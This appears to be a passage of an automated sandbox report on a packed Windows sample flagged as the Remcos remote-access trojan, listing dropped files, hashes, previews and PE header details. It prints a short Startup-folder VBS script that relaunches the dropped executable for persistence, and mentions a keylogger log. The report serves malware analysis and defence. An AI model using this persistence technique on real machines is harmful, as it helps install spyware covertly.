                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="488820" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\ProgramData\remcos\logs.dat

                  Download File
                  Process:C:\Windows\SysWOW64\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):184
                  Entropy (8bit):3.3928118725288807
                  Encrypted:false
                  SSDEEP:3:rhlKlTlTGlwfKlxPU5JWRal2Jl+7R0DAlBG4phlKlTlTGlwfKlxPPQblovDl6v:6lclPI5YcIeeDAlMlclPsbWAv
                  MD5:5AD886C53E3181D42C8C37FD02A617AB
                  SHA1:63286DC48329438E388B1549C46D939E694490A4
                  SHA-256:D7263F51A64B921097FFFB259CC0BA73E485876CF630CFA9803A61E5AC344DBF
                  SHA-512:617EBD7A0F84A1C6671ACABE03B45EF50DD1E08822966833675A0F2F84780041C29DA53B71774141513CF88BAB0379D45E69AE006A0EAAECB50B9F7090F6E2E6
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                  Preview:....[.2.0.2.4./.0.9./.0.6. .1.5.:.5.6.:.5.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.9./.0.6. .1.5.:.5.6.:.5.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                  C:\Users\user\AppData\Local\Temp\Lymnaeidae

                  Download File
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):494592
                  Entropy (8bit):7.648069693388643
                  Encrypted:false
                  SSDEEP:12288:EKeJlfV8SdLU0tuS5k2soir71v1yh9+1FjRVQdOXJjEDl:Ehd8SdLUsu8Fir7Xyh9+xCdOWx
                  MD5:D27901A98FCF9BA932E53C7450496F09
                  SHA1:423DB92CD7D8EF22A1F486A4547BD3B473ECC4A1
                  SHA-256:986EFA4E9A46AB0D0091CD50C8CF22101FE87C21729CE6D90B9441A6448E7071
                  SHA-512:A811201954A1F9998717621FE1F9305E1F2DE2FD2D1B96BEE1660E2235C4B5A63B9CFD10F52FD39810373FFC365281E3BE3316321A1C626064B2B1481936FE8D
                  Malicious:false
                  Preview:...5IB4M=EWG..JL.1A96IVQxNE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EOF69DS.?A.?.w.9...a"+GmI78 DX'l*P/WY=v3]n7B[j+Zm}..g[V.)g<L3.IVQ8NE791...#.).,.4.S.?.n(.".;.o<.W.;...G.V.O.[d7.K.0..$4...G...IkP.7...I;L.F...J X.3x'.9g#.2.+.G@R./...H.P.J.}l).,.4...>p,.(.Q--./.<4M9EWG69JLI1A96IVQ8NE75J.qM9.V@6../1A96IVQ8.E54AC:M97RG6/HLI1A9..UQ8^E75.G4M9.WG&9JLK1A<6HVQ8NE25KB4M9EWg>9JHI1A96ITQ8.E7%JB$M9EWW69ZLI1A96YVQ8NE75JB4M..QG28JLI.F9..VQ8NE75JB4M9EWG69JL.6A..IV..HE.5JB4M9EWG69JLI1A96I..>N]75J..K9.WG69JLI1A96I.T8N@75JB4M9EWG69JLI1A96IVQ8NE7.>'L99EW.G<JLY1A9DLVQ<NE75JB4M9EWG69jLIQoKR("08N.N4JB.H9E-F69<II1A96IVQ8NE75.B4..!63W9JL.lA96YQQ8@E75.D4M9EWG69JLI1Ay6I..L"675JB=M9EW719JNI1A.0IVQ8NE75JB4M9.WG..-* U296yTQ8N.05JF4M9EPG69JLI1A96IVQxNEw.81F.9EW.|9JL.6A9zIVQ<IE75JB4M9EWG69.LIqoKS%928N..5JB.J9EkG69.KI1A96IVQ8NE75.B4.9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8NE75JB4M9EWG69JLI1A96IVQ8

                  C:\Users\user\AppData\Local\Temp\aut4DA0.tmp

                  Download File
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.

                  C:\Users\user\AppData\Local\Temp\aut4E0F.tmp

                  Download File
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...

                  C:\Users\user\AppData\Local\Temp\aut536D.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.

                  C:\Users\user\AppData\Local\Temp\aut53CC.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...

                  C:\Users\user\AppData\Local\Temp\aut589D.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.

                  C:\Users\user\AppData\Local\Temp\aut58FC.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...

                  C:\Users\user\AppData\Local\Temp\aut8A2C.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.

                  C:\Users\user\AppData\Local\Temp\aut8A9B.tmp

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...

                  C:\Users\user\AppData\Local\Temp\intemeration

                  Download File
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):258082
                  Entropy (8bit):2.7962903456826793
                  Encrypted:false
                  SSDEEP:192:L9tu9P9lt9yJ969wa9dY9109cV9csqm0CpY+XzEa69FIoQKM5CfdeQVL3xAnonwU:6
                  MD5:853BE9124B51E48F5D850A835321CE11
                  SHA1:27873A837151FB53B7656C34A565745B84E38342
                  SHA-256:BB2A93BD61D6F95E4C9F0D4129D38633270DF2128C57B97F5406655861030D0B
                  SHA-512:192D1B16B630BA3237F19F5BAD187304B035C2C5C07AF9DB05C7F4DF763121D8B682A732D8728068DD92BD3D6BEF2ED98C8C3EFFFD0CFC87126894108E1B23FD
                  Malicious:false
                  Preview:6044B18406044B184x6044B18456044B18456044B18486044B184b6044B184e6044B184c6044B18486044B18416044B184e6044B184c6044B184c6044B184c6044B18406044B18426044B18406044B18406044B18406044B18406044B18456044B18466044B18456044B18476044B184b6044B18486044B18466044B184b6044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B18456044B18486044B18446044B184b6044B18496044B18466044B18456044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B184d6044B18486044B18466044B184b6044B184a6044B18476044B18426044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18456044B18456044B18486044B18486044B184b6044B18486044B18466044B184e6044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B18456044B18486044B184a6044B184b6044B18496044B18466044B18456044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446

                  C:\Users\user\AppData\Local\directory\name.exe

                  Download File
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Category:dropped
                  Size (bytes):826368
                  Entropy (8bit):7.981854223673753
                  Encrypted:false
                  SSDEEP:24576:4BXu9HGaVHUVeaBzcvMgTvk+39ABn8ApTZl:4w9VHUVebvjT19ABfp
                  MD5:B17E1003BB9BBE58E090C7752447C016
                  SHA1:A159B486E535469D4C49B227D27608F2AD48288E
                  SHA-256:D24D76D03365122AA5A4A7828A2D14368066DA840AE8945CF595A6B17CECA700
                  SHA-512:05077E35558E1BB636596D7A8C6B66F9554ECF8E057F61C3CF7F4AF91C19F898943A5DC8B1F13914B231E09671A36631E2490E0B32799250537A375DAD83AF3A
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 42%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....B.f.........."......p...@...P.......`........@.......................................@...@.......@.....................P...$.......P/..................t...........................................H...........................................UPX0.....P..............................UPX1.....p...`...d..................@....rsrc....@.......4...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                  Download File
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270
                  Entropy (8bit):3.4297698362729916
                  Encrypted:false
                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
                  MD5:3DA73F5D6073C0D8F7B9CEE8DF5035A7
                  SHA1:D4B44315FD7C6171A9CC03899A00E593AE78CDE7
                  SHA-256:1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
                  SHA-512:CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
                  Malicious:true
                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                  C:\Windows\appcompat\Programs\Amcache.hve

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.422217525488068
                  Encrypted:false
                  SSDEEP:6144:qSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:ZvloTyW+EZMM6DFyi03w
                  MD5:6D7CE8FBEAC1B888D888F048C600DC5D
                  SHA1:66E56F156A2559F2F892759CEB5DC148382ADC69
                  SHA-256:7E992D367C1D79D96182878744E97B956374EA9BA8C2FFC1E35DCF52536B32B0
                  SHA-512:4C294A1A1BCAEF20144E8CDEF28CF49CA2D445DA536551C6D3E494BEC3BA4AC797B5E21AA81773E2BDC4400B0C2C77809903C943FA3B625035319D267CCAA5E3
                  Malicious:false
                  Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Entropy (8bit):7.981854223673753
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.39%
                  • UPX compressed Win32 Executable (30571/9) 0.30%
                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  File name:jv4ri.exe
                  File size:826'368 bytes
                  MD5:b17e1003bb9bbe58e090c7752447c016
                  SHA1:a159b486e535469d4c49b227d27608f2ad48288e
                  SHA256:d24d76d03365122aa5a4a7828a2d14368066da840ae8945cf595a6b17ceca700
                  SHA512:05077e35558e1bb636596d7a8c6b66f9554ecf8e057f61c3cf7f4af91c19f898943a5dc8b1f13914b231e09671a36631e2490e0b32799250537a375dad83af3a
                  SSDEEP:24576:4BXu9HGaVHUVeaBzcvMgTvk+39ABn8ApTZl:4w9VHUVebvjT19ABfp
                  TLSH:3A0523D23EEA671BD4E042BADC53A530781B40E583F73B8D944FDAD2B96BBC0A851074
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:0f0dcc9a8acc490f

                  Static PE Info

                  General

                  Entrypoint:0x54c0b0
                  Entrypoint Section:UPX1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66DA42F5 [Thu Sep 5 23:47:01 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fc6683d30d9f25244a50fd5357825e79

                  Entrypoint Preview

                  Instruction
                  pushad
                  mov esi, 004F6000h
                  lea edi, dword ptr [esi-000F5000h]
                  push edi
                  jmp 00007F9FD47BE70Dh
                  nop
                  mov al, byte ptr [esi]
                  inc esi
                  mov byte ptr [edi], al
                  inc edi
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6EFh
                  mov eax, 00000001h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  add ebx, ebx
                  jnc 00007F9FD47BE70Dh
                  jne 00007F9FD47BE72Ah
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE721h
                  dec eax
                  add ebx, ebx
